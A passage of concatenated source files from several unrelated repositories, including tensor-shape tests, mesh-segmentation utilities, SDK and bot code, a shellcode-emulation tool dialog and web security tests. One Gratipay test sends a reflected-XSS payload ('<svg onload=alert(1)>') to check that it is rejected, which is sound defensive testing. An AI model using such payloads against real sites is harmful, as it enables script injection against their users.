edges=graph_edges_without_axes,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end),
'shape_calculation_mode': 'sizes'}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, output_shape,
graph.node['interpolate_data']['shape']))
@generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]),
([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600],
[8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]),
([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028],
[56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]),
([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380],
[20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345],
[60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]),
([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050],
[100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]),
([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]),
([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]),
([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]),
([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]),
([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349],
[60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]),
([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3],
[60, 22, 430, 500, 345, 349, 1],
[60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 0.3333333]),
])
def test_interpolate4_using_scales_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes,
scales):
graph = build_graph(nodes_attrs=graph_node_attrs_without_axes,
edges=graph_edges_without_axes,
update_attributes={
'input_data': {'shape': input_shape},
'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)},
'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)},
'interpolate': {'pads_begin': int64_array(pads_begin),
'pads_end': int64_array(pads_end),
'shape_calculation_mode': 'scales'}
})
node = Node(graph, 'interpolate')
tested_class = Interpolate(graph=graph, attrs=node.attrs())
tested_class.infer(node)
msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \
" expected_shape={}, actual_shape={}"
self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)),
msg.format(sizes, scales, pads_begin, pads_end, output_shape,
graph.node['interpolate_data']['shape']))
|
subdivnet/utils.py | 565353780/jittor-subdivnet | 145 | 12635739 | <reponame>565353780/jittor-subdivnet
import os
import json
from pathlib import Path
import numpy as np
import trimesh
import jittor as jt
from .mesh_tensor import MeshTensor
segment_colors = np.array([
[0, 114, 189],
[217, 83, 26],
[238, 177, 32],
[126, 47, 142],
[117, 142, 48],
[76, 190, 238],
[162, 19, 48],
[240, 166, 202],
])
def to_mesh_tensor(meshes):
return MeshTensor(jt.int32(meshes['faces']),
jt.float32(meshes['feats']),
jt.int32(meshes['Fs']))
def save_results(mesh_infos, preds, labels, name):
if not os.path.exists('results'):
os.mkdir('results')
if isinstance(labels, jt.Var):
labels = labels.data
results_path = Path('results') / name
results_path.mkdir(parents=True, exist_ok=True)
for i in range(preds.shape[0]):
mesh_path = mesh_infos['mesh_paths'][i]
mesh_name = Path(mesh_path).stem
mesh = trimesh.load_mesh(mesh_path, process=False)
mesh.visual.face_colors[:, :3] = segment_colors[preds[i, :mesh.faces.shape[0]]]
mesh.export(results_path / f'pred-{mesh_name}.ply')
mesh.visual.face_colors[:, :3] = segment_colors[labels[i, :mesh.faces.shape[0]]]
mesh.export(results_path / f'gt-{mesh_name}.ply')
def update_label_accuracy(preds, labels, acc):
if isinstance(preds, jt.Var):
preds = preds.data
if isinstance(labels, jt.Var):
labels = labels.data
for i in range(preds.shape[0]):
for k in range(len(acc)):
if (labels[i] == k).sum() > 0:
acc[k] += ((preds[i] == labels[i]) * (labels[i] == k)).sum() / (labels[i] == k).sum()
def compute_original_accuracy(mesh_infos, preds, labels):
if isinstance(preds, jt.Var):
preds = preds.data
if isinstance(labels, jt.Var):
labels = labels.data
accs = np.zeros(preds.shape[0])
for i in range(preds.shape[0]):
raw_labels = mesh_infos['raw_labels'][i]
raw_to_sub = mesh_infos['raw_to_sub'][i]
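        # raw_to_sub maps every face of the raw mesh to its covering face in the subdivided
        # mesh, so indexing the per-subdivided-face predictions with it yields a prediction
        # for each raw face, which is then compared against the raw labels.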
accs[i] = np.mean((preds[i])[raw_to_sub] == raw_labels)
return accs
class ClassificationMajorityVoting:
def __init__(self, nclass):
self.votes = {}
self.nclass = nclass
def vote(self, mesh_paths, preds, labels):
if isinstance(preds, jt.Var):
preds = preds.data
if isinstance(labels, jt.Var):
labels = labels.data
for i in range(preds.shape[0]):
name = (Path(mesh_paths[i]).stem).split('-')[0]
if not name in self.votes:
self.votes[name] = {
'polls': np.zeros(self.nclass, dtype=int),
'label': labels[i]
}
self.votes[name]['polls'][preds[i]] += 1
def compute_accuracy(self):
sum_acc = 0
for name, vote in self.votes.items():
pred = np.argmax(vote['polls'])
sum_acc += pred == vote['label']
return sum_acc / len(self.votes)
class SegmentationMajorityVoting:
def __init__(self, nclass, name=''):
self.votes = {}
self.nclass = nclass
self.name = name
def vote(self, mesh_infos, preds, labels):
if isinstance(preds, jt.Var):
preds = preds.data
if isinstance(labels, jt.Var):
labels = labels.data
for i in range(preds.shape[0]):
name = (Path(mesh_infos['mesh_paths'][i]).stem)[:-4]
nfaces = mesh_infos['raw_labels'][i].shape[0]
if not name in self.votes:
self.votes[name] = {
'polls': np.zeros((nfaces, self.nclass), dtype=int),
'label': mesh_infos['raw_labels'][i],
'raw_path': mesh_infos['raw_paths'][i],
}
polls = self.votes[name]['polls']
raw_to_sub = mesh_infos['raw_to_sub'][i]
raw_pred = (preds[i])[raw_to_sub]
polls[np.arange(nfaces), raw_pred] += 1
def compute_accuracy(self, save_results=False):
if save_results:
if self.name:
results_path = Path('results') / self.name
else:
results_path = Path('results')
results_path.mkdir(parents=True, exist_ok=True)
sum_acc = 0
all_acc = {}
for name, vote in self.votes.items():
label = vote['label']
pred = np.argmax(vote['polls'], axis=1)
acc = np.mean(pred == label)
sum_acc += acc
all_acc[name] = acc
if save_results:
mesh_path = vote['raw_path']
mesh = trimesh.load_mesh(mesh_path, process=False)
mesh.visual.face_colors[:, :3] = segment_colors[pred[:mesh.faces.shape[0]]]
mesh.export(results_path / f'pred-{name}.ply')
mesh.visual.face_colors[:, :3] = segment_colors[label[:mesh.faces.shape[0]]]
mesh.export(results_path / f'gt-{name}.ply')
if save_results:
with open(results_path / 'acc.json', 'w') as f:
json.dump(all_acc, f, indent=4)
return sum_acc / len(self.votes)
|
alipay/aop/api/response/AlipayOpenAppAppcontentPoiSyncResponse.py | antopen/alipay-sdk-python-all | 213 | 12635748 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayOpenAppAppcontentPoiSyncResponse(AlipayResponse):
def __init__(self):
super(AlipayOpenAppAppcontentPoiSyncResponse, self).__init__()
self._alipay_poi_id = None
@property
def alipay_poi_id(self):
return self._alipay_poi_id
@alipay_poi_id.setter
def alipay_poi_id(self, value):
self._alipay_poi_id = value
def parse_response_content(self, response_content):
response = super(AlipayOpenAppAppcontentPoiSyncResponse, self).parse_response_content(response_content)
if 'alipay_poi_id' in response:
self.alipay_poi_id = response['alipay_poi_id']
|
plugins/Operations/Misc/emulate_code_dialog.py | nmantani/FileInsight-plugins | 120 | 12635778 | <filename>plugins/Operations/Misc/emulate_code_dialog.py
#
# Emulate code - Emulate selected region as an executable or shellcode
# with Qiling Framework (the whole file if not selected)
#
# Copyright (c) 2020, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import sys
import time
import tkinter
import tkinter.ttk
import tkinter.messagebox
# Print the selected options as one tab-separated line (consumed by the caller) and close the dialog
def get_selection(r, ct, co, ca, ce, ea, t):
print("%s\t%s\t%s\t%s\t%s\t%s" % (ct.get(), co.get(), ca.get().lower(), ce.get(), ea.get(), t.get()), end="")
root.quit()
def combo_arch_selected(r, ca, le, ce):
# Hide / show endian combobox
if ca.get() in ("ARM", "ARM64", "MIPS"):
le.grid()
ce.grid()
else:
ce.current(0)
le.grid_remove()
ce.grid_remove()
def combo_type_selected(r, ct, la, ea):
# Hide / show arguments entry
if ct.get() == "Executable":
la.grid()
ea.grid()
else:
la.grid_remove()
ea.grid_remove()
def timeout_changed(*args):
if not re.match("^-?([0-9])+$", timeout.get()):
timeout.set("60")
elif int(timeout.get()) < 0:
timeout.set("0")
# Create selection dialog
root = tkinter.Tk()
root.title("Emulate code")
root.protocol("WM_DELETE_WINDOW", (lambda r=root: r.quit()))
label_type = tkinter.Label(root, text="File type:")
label_type.grid(row=0, column=0, padx=5, pady=5, sticky="w")
combo_type = tkinter.ttk.Combobox(root, state="readonly")
combo_type["values"] = ("Executable", "Shellcode")
combo_type.current(0)
combo_type.grid(row=0, column=2, padx=5, pady=5, sticky="w")
label_os = tkinter.Label(root, text="OS:")
label_os.grid(row=1, column=0, padx=5, pady=5, sticky="w")
combo_os = tkinter.ttk.Combobox(root, state="readonly")
combo_os["values"] = ("Windows", "Linux") # Currently macOS, UEFI and FreeBSD are excluded
combo_os.current(0)
combo_os.grid(row=1, column=2, padx=5, pady=5, sticky="w")
label_arch = tkinter.Label(root, text="Architecture:")
label_arch.grid(row=2, column=0, padx=5, pady=5, sticky="w")
combo_arch = tkinter.ttk.Combobox(root, state="readonly")
combo_arch["values"] = ("x64", "x86", "ARM", "ARM64", "MIPS")
combo_arch.current(0)
combo_arch.grid(row=2, column=2, padx=5, pady=5, sticky="w")
label_endian = tkinter.Label(root, text="Big endian:")
label_endian.grid(row=3, column=0, padx=5, pady=5, sticky="w")
label_endian.grid_remove()
combo_endian = tkinter.ttk.Combobox(root, state="readonly")
combo_endian["values"] = ("False", "True")
combo_endian.current(0)
combo_endian.grid(row=3, column=2, padx=5, pady=5, sticky="w")
combo_endian.grid_remove()
label_args = tkinter.Label(root, text="Command line arguments:")
label_args.grid(row=4, column=0, padx=5, pady=5, sticky="w")
entry_args = tkinter.Entry(width=24)
entry_args.grid(row=4, column=2, padx=5, pady=5, sticky="w")
label_timeout = tkinter.Label(root, text="Emulation timeout\n(seconds, 0 = no timeout):", justify="left")
label_timeout.grid(row=5, column=0, padx=5, pady=5, sticky="w")
timeout = tkinter.StringVar()
timeout.set("60")
timeout.trace("w", timeout_changed)
spin_timeout = tkinter.Spinbox(root, textvariable=timeout, width=4, from_=0, to=10000)
spin_timeout.grid(row=5, column=2, padx=5, pady=5, sticky="w")
button = tkinter.Button(root, text="OK", command=(lambda r=root, ct=combo_type, co=combo_os, ca=combo_arch, ce=combo_endian, ea=entry_args, t=timeout: get_selection(r, ct, co, ca, ce, ea, t)))
button.grid(row=6, column=0, padx=5, pady=5, columnspan=3)
button.focus() # Focus to this widget
# Set callback functions
combo_arch.bind('<<ComboboxSelected>>', lambda event, r=root, ca=combo_arch, le=label_endian, ce=combo_endian: combo_arch_selected(r, ca, le, ce))
combo_type.bind('<<ComboboxSelected>>', lambda event, r=root, ct=combo_type, la=label_args, ea=entry_args: combo_type_selected(r, ct, la, ea))
for x in (combo_type, combo_os, combo_arch, combo_endian, entry_args, spin_timeout, button):
x.bind("<Return>", lambda event, r=root, ct=combo_type, co=combo_os, ca=combo_arch, ce=combo_endian, ea=entry_args, t=timeout: get_selection(r, ct, co, ca, ce, ea, t))
# Adjust window position
sw = root.winfo_screenwidth()
sh = root.winfo_screenheight()
root.update_idletasks() # Necessary to get width and height of the window
ww = root.winfo_width()
wh = root.winfo_height()
root.geometry('+%d+%d' % ((sw/2) - (ww/2), (sh/2) - (wh/2)))
root.mainloop()
|
tests/unit/commands/status_test.py | gamechanger/dusty | 421 | 12635796 | from mock import patch, Mock, call
from ...testcases import DustyTestCase
from dusty.commands.status import _has_active_container, get_dusty_status
from dusty.schemas.base_schema_class import DustySchema
from ..utils import get_app_dusty_schema, get_bundle_dusty_schema, get_lib_dusty_schema
class TestStatusCommands(DustyTestCase):
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_lib_active(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = ['some_container']
self.assertEquals(False, _has_active_container('lib', 'lib-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_lib_inactive(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = []
self.assertEquals(False, _has_active_container('lib', 'lib-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_app_active(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = ['some_container']
self.assertEquals(True, _has_active_container('app', 'app-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_app_inactive(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = []
self.assertEquals(False, _has_active_container('app', 'app-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_service_active(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = ['some_container']
self.assertEquals(True, _has_active_container('service', 'service-a'))
@patch('dusty.commands.status.get_dusty_containers')
def test_has_active_container_service_inactive(self, fake_get_dusty_containers):
fake_get_dusty_containers.return_value = []
self.assertEquals(False, _has_active_container('service', 'service-a'))
@patch('dusty.commands.status.docker_vm_is_running')
@patch('dusty.systems.docker.get_docker_client')
@patch('dusty.commands.status.PrettyTable')
@patch('dusty.commands.status.get_dusty_containers')
@patch('dusty.schemas.base_schema_class.get_specs_from_path')
@patch('dusty.compiler.spec_assembler._get_referenced_apps')
@patch('dusty.compiler.spec_assembler._get_referenced_libs')
@patch('dusty.compiler.spec_assembler._get_referenced_services')
def test_get_dusty_status_active_1(self, fake_get_services, fake_get_libs, fake_get_apps, fake_get_specs,
fake_get_dusty_containers, fake_pretty_table, fake_get_docker_client, fake_vm_is_running):
fake_get_services.return_value = set(['ser1', 'ser2', 'ser3'])
fake_get_libs.return_value = set(['lib1'])
fake_get_apps.return_value = set(['app1', 'app2'])
fake_table = Mock()
fake_pretty_table.return_value = fake_table
fake_get_dusty_containers.return_value = ['some_container']
fake_get_specs.return_value = {'apps': {'app1': get_app_dusty_schema({}, 'app1'), 'app2':get_app_dusty_schema({}, 'app2')},
'libs': {'lib1': get_lib_dusty_schema({}, 'lib1')},
'services': {'ser1': DustySchema(None, {}, 'ser1', 'services'), 'ser2': DustySchema(None, {}, 'ser2', 'services'), 'ser3': DustySchema(None, {}, 'ser3', 'services')},
'bundles': get_lib_dusty_schema({}, 'bundle')}
fake_get_docker_client.return_value = None
fake_vm_is_running.return_value = True
get_dusty_status()
call_args_list = fake_table.add_row.call_args_list
self.assertTrue(call(['app1', 'app', 'X']) in call_args_list)
self.assertTrue(call(['app2', 'app', 'X']) in call_args_list)
self.assertTrue(call(['lib1', 'lib', '']) in call_args_list)
self.assertTrue(call(['ser1', 'service', 'X']) in call_args_list)
self.assertTrue(call(['ser2', 'service', 'X']) in call_args_list)
self.assertTrue(call(['ser3', 'service', 'X']) in call_args_list)
self.assertTrue(call(['dustyInternalNginx', '', 'X']) in call_args_list)
self.assertEquals(len(call_args_list), 7)
@patch('dusty.commands.status.docker_vm_is_running')
@patch('dusty.systems.docker.get_docker_client')
@patch('dusty.commands.status.PrettyTable')
@patch('dusty.commands.status.get_dusty_containers')
@patch('dusty.schemas.base_schema_class.get_specs_from_path')
@patch('dusty.compiler.spec_assembler._get_referenced_apps')
@patch('dusty.compiler.spec_assembler._get_referenced_libs')
@patch('dusty.compiler.spec_assembler._get_referenced_services')
def test_get_dusty_status_active_2(self, fake_get_services, fake_get_libs, fake_get_apps, fake_get_specs,
fake_get_dusty_containers, fake_pretty_table, fake_get_docker_client, fake_vm_is_running):
fake_get_services.return_value = set(['ser1', 'ser2', 'ser3'])
fake_get_libs.return_value = set(['lib1'])
fake_get_apps.return_value = set(['app1', 'app2'])
fake_table = Mock()
fake_pretty_table.return_value = fake_table
fake_get_dusty_containers.return_value = []
fake_get_specs.return_value = {'apps': {'app1': get_app_dusty_schema({}, 'app1'), 'app2':get_app_dusty_schema({}, 'app2')},
'libs': {'lib1': get_lib_dusty_schema({}, 'lib1')},
'services': {'ser1': DustySchema(None, {}, 'ser1', 'services'), 'ser2': DustySchema(None, {}, 'ser2', 'services'), 'ser3': DustySchema(None, {}, 'ser3', 'services')},
'bundles': get_lib_dusty_schema({}, 'bundle')}
fake_get_docker_client.return_value = None
fake_vm_is_running.return_value = True
get_dusty_status()
call_args_list = fake_table.add_row.call_args_list
self.assertTrue(call(['app1', 'app', '']) in call_args_list)
self.assertTrue(call(['app2', 'app', '']) in call_args_list)
self.assertTrue(call(['lib1', 'lib', '']) in call_args_list)
self.assertTrue(call(['ser1', 'service', '']) in call_args_list)
self.assertTrue(call(['ser2', 'service', '']) in call_args_list)
self.assertTrue(call(['ser3', 'service', '']) in call_args_list)
self.assertTrue(call(['dustyInternalNginx', '', '']) in call_args_list)
self.assertEquals(len(call_args_list), 7)
|
corehq/ex-submodules/casexml/apps/phone/tests/test_sync_purge.py | omari-funzone/commcare-hq | 471 | 12635805 | <filename>corehq/ex-submodules/casexml/apps/phone/tests/test_sync_purge.py
import uuid
from django.test import TestCase
from testil import eq
from casexml.apps.case.xml import V1
from casexml.apps.phone.exceptions import MissingSyncLog
from casexml.apps.phone.models import get_alt_device_id
from casexml.apps.phone.tests.utils import create_restore_user
from casexml.apps.phone.utils import MockDevice
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.models import Domain
from corehq.apps.receiverwrapper.util import submit_form_locally
from corehq.form_processor.tests.utils import FormProcessorTestUtils
from corehq.form_processor.utils import get_simple_form_xml
class TestSyncPurge(TestCase):
@classmethod
def setUpClass(cls):
super(TestSyncPurge, cls).setUpClass()
cls.domain = uuid.uuid4().hex
cls.project = Domain(name=cls.domain)
cls.project.save()
cls.restore_user = create_restore_user(domain=cls.domain)
cls.app = Application(domain=cls.domain)
cls.app.save()
@classmethod
def tearDownClass(cls):
FormProcessorTestUtils.delete_all_xforms(cls.domain)
FormProcessorTestUtils.delete_all_sync_logs()
cls.project.delete()
super(TestSyncPurge, cls).tearDownClass()
def test_prune_synclogs(self):
device = MockDevice(self.project, self.restore_user)
initial_sync = device.sync(items=True, version=V1, app=self.app)
initial_synclog_id = initial_sync.restore_id
self.assertIsNone(initial_sync.get_log().previous_log_id)
# form submission success when there is no previous sync log
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=initial_synclog_id)
# more syncs
second_sync = device.sync(version=V1, app=self.app)
third_sync = device.sync(version=V1, app=self.app)
# form submission should remove all previous syncs
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id)
third_synclog = third_sync.get_log() # re-fetch
self.assertIsNone(third_synclog.previous_log_id)
with self.assertRaises(MissingSyncLog):
initial_sync.get_log()
with self.assertRaises(MissingSyncLog):
second_sync.get_log()
# form submissions after purge don't fail
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id)
# restores after purge don't fail
fourth_sync = device.sync(version=V1, app=self.app)
response = fourth_sync.config.get_response()
self.assertEqual(response.status_code, 200)
def test_prune_formplayer_synclogs(self):
device = MockDevice(self.project, self.restore_user)
device.id = 'WebAppsLogin-' + device.id
first_sync = device.sync()
second_sync = device.sync()
third_sync = device.sync()
device2 = MockDevice(self.project, self.restore_user)
device2.id = 'WebAppsLogin-' + device2.id
other_sync = device2.sync()
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id)
self.assertIsNone(third_sync.get_log().previous_log_id)
with self.assertRaises(MissingSyncLog):
first_sync.get_log()
with self.assertRaises(MissingSyncLog):
second_sync.get_log()
# Other sync for same user but with different device ID is still there
self.assertIsNotNone(other_sync.get_log())
# form submissions after purge don't fail
form_xml = get_simple_form_xml(uuid.uuid4().hex)
submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id)
# restores after purge don't fail
fourth_sync = device.sync()
response = fourth_sync.config.get_response()
self.assertEqual(response.status_code, 200)
def test_get_alt_device_id():
eq(get_alt_device_id('WebAppsLogin*<EMAIL>*as*example.mr.snuggles'),
'WebAppsLogin*<EMAIL>*as*example.mr.snuggles')
|
Scripts/Bots/runPython_bot/start.py | ShivangiPatel102/Python_and_the_Web | 437 | 12635815 | from bot import run_python_bot
import logging
from pytz import timezone
from datetime import datetime
TIMEZONE = "Asia/Kolkata"
logging.Formatter.converter = lambda *args: datetime.now(
tz=timezone(TIMEZONE)
).timetuple()
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
level=logging.INFO,
datefmt="%d/%m/%Y %I:%M:%S %p",
)
logger = logging.getLogger()
logger.setLevel(20)
run_python_bot.bot()
|
WebMirror/management/rss_parser_funcs/feed_parse_extractTandQ.py | fake-name/ReadableWebProxy | 193 | 12635827 | def extractTandQ(item):
"""
T&Q
"""
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol or frag) or 'preview' in item['title'].lower():
return None
bad = [
'#K-drama',
'fashion',
'C-Drama',
'#Trending',
'Feature',
'#Trailer',
'#Eng Sub',
'Movies',
'Status Updates/Post Tallies',
'Learn Chinese',
'Short Stories',
]
if any([(tmp in item['tags']) for tmp in bad]):
return None
tagmap = [
('Three Kingdoms Online Overlord', 'Three Kingdoms Online Overlord', 'translated'),
('Three Kingdoms Online Overlord | 网游之三国超级领主', 'Three Kingdoms Online Overlord', 'translated'),
('Perfect Fiance', 'Perfect Fiancé', 'translated'),
('Perfect Fiancé | 完美未婚夫', 'Perfect Fiancé', 'translated'),
('Ten Years are not that Far', 'Ten Years are not that Far', 'translated'),
('#Les Interpretes', 'Les Interpretes', 'translated'),
('致我们终将逝去的青春', 'To Our Youth That is Fading Away', 'translated'),
('So Young | 致我们终将逝去的青春', 'To Our Youth That is Fading Away', 'translated'),
("Fleeting Midsummer (Beijing University's Weakest Student)", "Fleeting Midsummer (Beijing University's Weakest Student)", 'translated'),
("Fleeting Midsummer (Peking University's Weakest Student)", "Fleeting Midsummer (Peking University's Weakest Student)", 'translated'),
("Fleeting Midsummer (Peking University's Weakest Student)| 北大差生·", "Fleeting Midsummer (Peking University's Weakest Student)", 'translated'),
("Fleeting Midsummer (Peking University's Weakest Student)| 北大差生", "Fleeting Midsummer (Peking University's Weakest Student)", 'translated'),
('When A Snail Falls in Love| 如果蜗牛有爱情', 'When A Snail Falls in Love', 'translated'),
('The Rebirth of an Ill-Fated Consort | 重生之嫡女祸妃', 'The Rebirth of an Ill-Fated Consort', 'translated'),
('Siege in Fog | 迷雾围城', 'Siege in Fog', 'translated'),
('Pristine Darkness | 他来了请闭眼之暗粼', 'Pristine Darkness', 'translated'),
('Les Interpretes | 亲爱的翻译官', 'Les Interpretes', 'translated'),
('Les Interpretes | 情爱的翻译官', 'Les Interpretes', 'translated'),
('The Daily Record of Secretly Loving the Male Idol|男神暗恋日记', 'The Daily Record of Secretly Loving the Male Idol', 'translated'),
('Master Devil Don\'t Kiss Me', 'Master Devil Don\'t Kiss Me', 'translated'),
('Master Devil Don\'t Kiss Me! | 恶魔少爷别吻我', 'Master Devil Don\'t Kiss Me', 'translated'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
tests/py/test_security.py | kant/gratipay.com | 517 | 12635845 | from __future__ import absolute_import, division, print_function, unicode_literals
import struct
import datetime
from aspen import Response
from aspen.http.request import Request
from base64 import urlsafe_b64decode
from cryptography.fernet import Fernet, InvalidToken
from gratipay import security
from gratipay.models.participant import Identity
from gratipay.security.crypto import EncryptingPacker
from gratipay.testing import Harness
from pytest import raises
class RejectNullBytesInURI(Harness):
def test_filters_path(self):
assert self.client.GxT('/f%00/').code == 400
def test_filters_querystring(self):
assert self.client.GxT('/', QUERY_STRING='f%00=bar').code == 400
def test_protects_against_reflected_xss(self):
self.make_package()
assert self.client.GET('/on/npm/foo').code == 200
assert self.client.GxT('/on/npm/foo%00<svg onload=alert(1)>').code == 400
assert self.client.GxT('/on/npm/foo%01<svg onload=alert(1)>').code == 404 # fyi
class OnlyAllowCertainMethodsTests(Harness):
def test_is_installed_properly(self):
assert self.client.hxt('TRaCE', '/').code == 405
def test_allows_certain_methods(self):
for allowed in ('GEt', 'HEaD', 'PosT'):
request = Request(allowed)
assert security.only_allow_certain_methods(request) is None
def test_disallows_a_bunch_of_other_stuff(self):
for disallowed in ('OPTIONS', 'TRACE', 'TRACK', 'PUT', 'DELETE'):
request = Request(disallowed)
response = raises(Response, security.only_allow_certain_methods, request).value
assert response.code == 405
def test_doesnt_choke_error_handling(self):
assert self.client.hit("OPTIONS", "/", raise_immediately=False).code == 405
def test_prevents_csrf_from_choking(self):
assert self.client.PxST('/assets/gratipay.css').code == 405
class AddHeadersToResponseTests(Harness):
def test_sets_x_frame_options(self):
headers = self.client.GET('/about/').headers
assert headers['X-Frame-Options'] == 'SAMEORIGIN'
def test_sets_x_content_type_options(self):
headers = self.client.GET('/about/').headers
assert headers['X-Content-Type-Options'] == 'nosniff'
def test_sets_x_xss_protection(self):
headers = self.client.GET('/about/').headers
assert headers['X-XSS-Protection'] == '1; mode=block'
def test_sets_referrer_policy(self):
headers = self.client.GET('/about/').headers
assert headers['Referrer-Policy'] == \
'no-referrer-when-downgrade, strict-origin-when-cross-origin'
def test_sets_strict_transport_security(self):
headers = self.client.GET('/about/').headers
assert headers['strict-transport-security'] == 'max-age=31536000'
def test_doesnt_set_content_security_policy_by_default(self):
assert 'content-security-policy-report-only' not in self.client.GET('/about/').headers
def test_sets_content_security_policy(self):
with self.setenv(CSP_REPORT_URI='http://cheese/'):
headers = self.client.GET('/about/').headers
policy = (
"default-src 'self';"
"script-src 'self' assets.gratipay.com 'unsafe-inline';"
"style-src 'self' assets.gratipay.com downloads.gratipay.com cloud.typography.com"
" 'sha256-WLocK7HeCKzQLS0M+PGS++5IhyfFsOA5N4ZCeTcltoo=';"
"img-src *;"
"font-src 'self' assets.gratipay.com cloud.typography.com data:;"
"block-all-mixed-content;"
"report-uri http://cheese/;"
)
assert headers['content-security-policy-report-only'] == policy
class EncryptingPackerTests(Harness):
